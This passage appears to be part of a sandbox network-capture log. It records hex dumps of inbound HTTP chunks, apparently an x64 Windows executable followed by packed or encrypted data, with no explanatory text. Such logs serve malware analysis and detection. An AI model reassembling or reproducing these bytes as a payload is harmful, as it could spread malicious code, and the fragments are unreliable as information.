50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28 Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
2023-03-17 08:11:51 UTC	72	IN	Data Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15 Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
2023-03-17 08:11:51 UTC	80	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	80	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff Data Ascii: 4000HD$ tX$$$HD$ a\|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
2023-03-17 08:11:51 UTC	88	IN	Data Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 Data Ascii: @> ?-DT!?AsAA
2023-03-17 08:11:51 UTC	96	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	96	IN	Data Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0 Data Ascii: 40000~@P`pX~x~
2023-03-17 08:11:51 UTC	104	IN	Data Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c Data Ascii: hVxWXY<v
2023-03-17 08:11:51 UTC	112	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	112	IN	Data Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15 Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
2023-03-17 08:11:51 UTC	120	IN	Data Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11 Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
2023-03-17 08:11:51 UTC	128	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	128	IN	Data Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8 Data Ascii: 4000f@\|h@@T@zB0\|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
2023-03-17 08:11:51 UTC	136	IN	Data Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
2023-03-17 08:11:51 UTC	144	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	144	IN	Data Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30 Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}\|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
2023-03-17 08:11:51 UTC	152	IN	Data Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
2023-03-17 08:11:51 UTC	160	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	160	IN	Data Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93 Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L\|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
2023-03-17 08:11:51 UTC	168	IN	Data Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62 Data Ascii: Btp}\|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s\|Ur\m\|'&bA@l=VM%(b
2023-03-17 08:11:51 UTC	176	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	176	IN	Data Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0 Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl\|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0\|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E\|'4za
2023-03-17 08:11:51 UTC	184	IN	Data Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46 Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc\|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
2023-03-17 08:11:51 UTC	192	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	192	IN	Data Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45 Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
2023-03-17 08:11:51 UTC	200	IN	Data Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28 Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:\|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%\|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
2023-03-17 08:11:51 UTC	208	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	208	IN	Data Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73 Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4wS$4zS)R(kD]B5t\|X<hxT/I3E1,e1E7m-:bA10\\pls
2023-03-17 08:11:51 UTC	216	IN	Data Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71 Data Ascii: #k#qPY<\|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R\|{I\|5\tFM6fbk%@Z&Ew'~Fq
2023-03-17 08:11:51 UTC	224	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	224	IN	Data Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH 